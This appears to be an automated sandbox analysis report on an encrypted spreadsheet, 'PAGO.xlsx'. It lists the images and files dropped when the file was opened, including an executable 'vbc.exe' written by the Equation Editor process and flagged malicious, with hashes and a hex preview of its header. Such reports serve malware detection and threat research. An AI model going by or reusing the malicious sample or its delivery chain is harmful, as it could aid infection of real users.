                                                  SHA-256:25E0551B553056F7B434BB533563116CB8E59620A629EDB898B3B457C1EFC3A0
                                                  SHA-512:313F7A4E22367D35D43494272DBF4D23A2659E1B48D3C31639A7B8D54B09FB26891FD0C71AA610D23F638743A3FEEC7B2A35BC36E84D8830EAB509D2F1A8F91A
                                                  Malicious:false
                                                  Preview: ....l................................... EMF........1...................V...........................fZ..U"..F...........GDIC........K.tu....................................................................iii.......-.........!.................!.............................-.........!.................!.............................-.........!.................!.............................-.........!.................!.............................-.........!...............-.........!..................................................................................@..Calibri......m.......Iww@.zw..f.....-.................'.....................................................................................!.......'...............iii.....%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d.......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715928FD.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                  Category:dropped
                                                  Size (bytes):14198
                                                  Entropy (8bit):7.916688725116637
                                                  Encrypted:false
                                                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                  Malicious:false
                                                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\806800C6.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                  Category:dropped
                                                  Size (bytes):48770
                                                  Entropy (8bit):7.801842363879827
                                                  Encrypted:false
                                                  SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                  MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                  SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                  SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                  SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                  Malicious:false
                                                  Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8299D048.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3
                                                  Category:dropped
                                                  Size (bytes):3455
                                                  Entropy (8bit):7.774304410172069
                                                  Encrypted:false
                                                  SSDEEP:96:aUE73PJLlC/btznr7ELFGcVMS5MFeEnuOOshNzSZn40YTo3:aUMBLlCDtn7CVVMS5JEnuUzSt4TT0
                                                  MD5:B6EE1614D1302AD75B751F7134E57AA8
                                                  SHA1:CD0071E2B61C622CFA38FACE83826A42CD6F7116
                                                  SHA-256:6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
                                                  SHA-512:849EBCD27DE319A9320E3A614FF57BF3E6292ACD68020E977435D84C17A7FBBFB460E7E07EA576EE6531359DC2A200BCC2CB828C7690841E433B3B6CA872CE6E
                                                  Malicious:false
                                                  Preview: ......JFIF.............C....................................................................C.......................................................................Y.X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........o.K,.(....]....h&c..<.....vvg..Zg.w...O.O.&...........|.....YKqwk..341.... 8vR.0.9..V..I.XOmq%....(....E.#.C4..!.R..F..Z.Y.p...S.wj.....2.~....n?..?.o.J....v....E.........v..~..}..s.6....{...q.\>..+..J..N.Pq.....S..-!.ew../.d .lr...:g.3BH.......).........?.Y...0...G.3....-V..L7..%W.QG*.........g....;|L....g......U.....?.Y...0...^.E..>.K.......C.....3..U
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84B2BE14.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                  Category:dropped
                                                  Size (bytes):48770
                                                  Entropy (8bit):7.801842363879827
                                                  Encrypted:false
                                                  SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                  MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                  SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                  SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                  SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                  Malicious:false
                                                  Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\863DC596.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10715
                                                  Entropy (8bit):7.414910193109876
                                                  Encrypted:false
                                                  SSDEEP:192:o98wfjpHmBG5X18nbtppfc3yX1cbzIvwjBYlE7KmnmF2888888u:SNGBgX+hpp0ClcHIvqYWnmFL
                                                  MD5:FE450E7017E0F21A25701C4ABC68021B
                                                  SHA1:06090A749D7077371AFBB5DC698C60FE861B676E
                                                  SHA-256:B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
                                                  SHA-512:815A8784FCA30B9F882CB460DB9B47919B13D8C32673BEA14CDB63E70424917B02E6F220E55E3710C7E97EAE15EBA7968936A585D235947AA7124E5042BEA577
                                                  Malicious:false
                                                  Preview: .PNG........IHDR..............c......sBIT....|.d.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>..);IDATx^....,G.7...@..$.....=........wwwwww....I.._....3wV.....S..w..........w[[R#. @....... @....[&........O?.R..e........ @........+.......A....... @......-...?.....O....... @..........f@....... @......- ._..... @....... @.@.....MS @....... @......../ZX.... @....... @ .F....... @....... ...S....... @...........|.-@... @....... @`)...0+....... @....... ..{.P..... @.......X..E.w...l... @....... @.....\.J...G.... @....... @.......LA_8.... @....... @`........co..O....... @..........-._<.... @....... @`...;.......?..... @......,^.....|..J @....... @..............?..... @......,^..O}..|..J @....... @......`......... @....... @.......i...gV...... @.......]...<..|.@... @....... @`..G."V._.... @....... @....^../............ @......!..o.L...he. @....... @...S...... @....... ........A....... @.............. @........b...ydS.j........ @......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91086113.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3
                                                  Category:dropped
                                                  Size (bytes):7934
                                                  Entropy (8bit):7.877426792469052
                                                  Encrypted:false
                                                  SSDEEP:192:aPlVOjcI3QmjR79Z/7qjw0qwzhjBPlB4yinZe87:aPlIhJpqjwpwVjZSga
                                                  MD5:BBACB9E08630847C0E6E84B5100C40C3
                                                  SHA1:FDE4F15306F56139583ECB5E0EC99884A3F32371
                                                  SHA-256:79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
                                                  SHA-512:E7C0A5E9FD51C4A813B7F70A6B5AD8F47AED7B7D1033A9F114B4D988CCD256CD376FC822EB6F9C4F9B3E095128AD905397C1F8D5AEE550615F2DD80E5AEA6F72
                                                  Malicious:false
                                                  Preview: ......JFIF.............C....................................................................C.......................................................................|...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}...g...M.W...t....4K)..P*...I.Q......../.....B_..........U..z.g....d...p.-Z..^.o........_./Z..n.dk%......0..QX*.%.c..yv8p.hN.d..t'._.":.B_.......O.f....."R...............f..&.Zu[..-........c]....Z..~frx.[....a.j..H..Zl8y....x..h.)B...)"...*. ...t}[...}.p......._.H...w...iG..D.....9......{..}*.J...y....o..!..`.@....)8...s./...'.SL..B..}j...X.#Y..a.93\#...^&.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1EB740D.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):79394
                                                  Entropy (8bit):7.864111100215953
                                                  Encrypted:false
                                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                  MD5:16925690E9B366EA60B610F517789AF1
                                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                  Malicious:false
                                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2AC4F99.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                  Category:dropped
                                                  Size (bytes):8815
                                                  Entropy (8bit):7.944898651451431
                                                  Encrypted:false
                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                  Malicious:false
                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B982CC9F.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                  Category:dropped
                                                  Size (bytes):8815
                                                  Entropy (8bit):7.944898651451431
                                                  Encrypted:false
                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                  Malicious:false
                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C43329EC.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):51166
                                                  Entropy (8bit):7.767050944061069
                                                  Encrypted:false
                                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD298C7E.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1820
                                                  Entropy (8bit):2.083742040780784
                                                  Encrypted:false
                                                  SSDEEP:12:YtFA8ankaHslqI8/p02Q4v2rPm6jsfVhEOlxqtDYckgeHQqP65XtXeuCrpQPEuSk:Y9UVH9JR0J4v27mXfxOD3ezuBPbRF
                                                  MD5:0BE8521EC30BD162F021BD7E346B2469
                                                  SHA1:12CFE6A40DDC1ED2C923115470A4FC6C390FD6CD
                                                  SHA-256:66A1AE17856C8DE3DDD46040052DDE5EF9214548BB74E103856D2FDB6224EACD
                                                  SHA-512:BB20725590AFAA3B46829796CF21370DCDD8081A47BC52EEBDB0E1422A74983F691A0789FD92A86873BD477292F9DC551E4287D470105E1D86FD5AC86C38E975
                                                  Malicious:false
                                                  Preview: ....l................................... EMF........(...................V...........................fZ..U"..F...........GDIC...............r.........................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2.....................'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d...................................!..............?...........?................................L...d.......................
                                                  C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):241332
                                                  Entropy (8bit):4.20677035289511
                                                  Encrypted:false
                                                  SSDEEP:1536:cGxLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cANNSk8DtKBrpb2vxrOpprf/nVq
                                                  MD5:E8F178E7287D2141385C4C189AAFB00C
                                                  SHA1:8C32B4818B3D1C2E64B232C782C65511C1E69F10
                                                  SHA-256:0AF00FD1025E42AB16E54251F13AB527083B32221699E3B5AED0E9C862A000DC
                                                  SHA-512:1102766FE837073EC083BE05415047AE5F31E40901C8EA4997ECF3E5DD8C5350D329D6EEA05A9390BA1E41D4CF2F03BA8AA575212B5A16E8861E53C12CF7E6C6
                                                  Malicious:false
                                                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                  C:\Users\user\Desktop\~$PAGO.xlsx
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):330
                                                  Entropy (8bit):1.4377382811115937
                                                  Encrypted:false
                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                  Malicious:true
                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  C:\Users\Public\vbc.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):908800
                                                  Entropy (8bit):7.231779565509928
                                                  Encrypted:false
                                                  SSDEEP:12288:SSLIIK2eESKnuHOvMUUzui2KrbCR4MzRBMuWRTIv/YLOn8gsIKUvE+:SSEIVfuuU/zbCxz4FYwankIc
                                                  MD5:F31B0E7D038ED9D64BE2C6EF94FA5171
                                                  SHA1:A4311EA256FB28FA7815249F43C903641C7114DA
                                                  SHA-256:30865D42D9897A6611DF8683BC041836794CF6D7EE47763281FBED0F063A7C8E
                                                  SHA-512:45C21E3BF159C80ED6978A92134397074CAFEC0E5239660C5C691EF3769764209922FEC772612C61E12D45A3C157E69264C3BCD89D3CD1EC142778E42B76DE01
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.n`..............P......F........... ........@.. .......................@............@.................................H...O.......4B................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...4B.......D..................@..@.reloc....... ......................@..B................|.......H........?..`H..............h,...........................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....ol...('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......

                                                  Static File Info

                                                  General

                                                  File type:CDFV2 Encrypted
                                                  Entropy (8bit):7.957673724429131
                                                  TrID:
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                  File name:PAGO.xlsx
                                                  File size:499200
                                                  MD5:db190ad25a453084bc89ecb5d46d6e0a
                                                  SHA1:999aacfcfee17aaa6231cf858af787d5ddce8774
                                                  SHA256:4273c2c75793063754de785ea06da2e149f8e659db159e94e73be5b23abdd3a7
                                                  SHA512:e8fceb6bd1294aac31b3bb4cc23987fc0b221c3ea29fbf576586e7970599c53b5e393002b86250c379801040ffee24a3b72a6f72b5777d99ece564997d1a59e5
                                                  SSDEEP:12288:ImtteLl250toAGzti9IiL6JpuX95mLrw6o:zEq0GAG1iS2Xv
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                  Static OLE Info

                                                  General

                                                  Document Type:OLE
                                                  Number of OLE Files:1

                                                  OLE File "PAGO.xlsx"

                                                  Indicators

                                                  Has Summary Info:False
                                                  Application Name:unknown
                                                  Encrypted Document:True
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:False
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:
                                                  Flash Objects Count:
                                                  Contains VBA Macros:False

                                                  Streams

                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                  General
                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                  File Type:data
                                                  Stream Size:64
                                                  Entropy:2.73637206947
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                  General
                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                  File Type:data
                                                  Stream Size:112
                                                  Entropy:2.7597816111
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                  General
                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                  File Type:data
                                                  Stream Size:200
                                                  Entropy:3.13335930328
                                                  Base64 Encoded:False
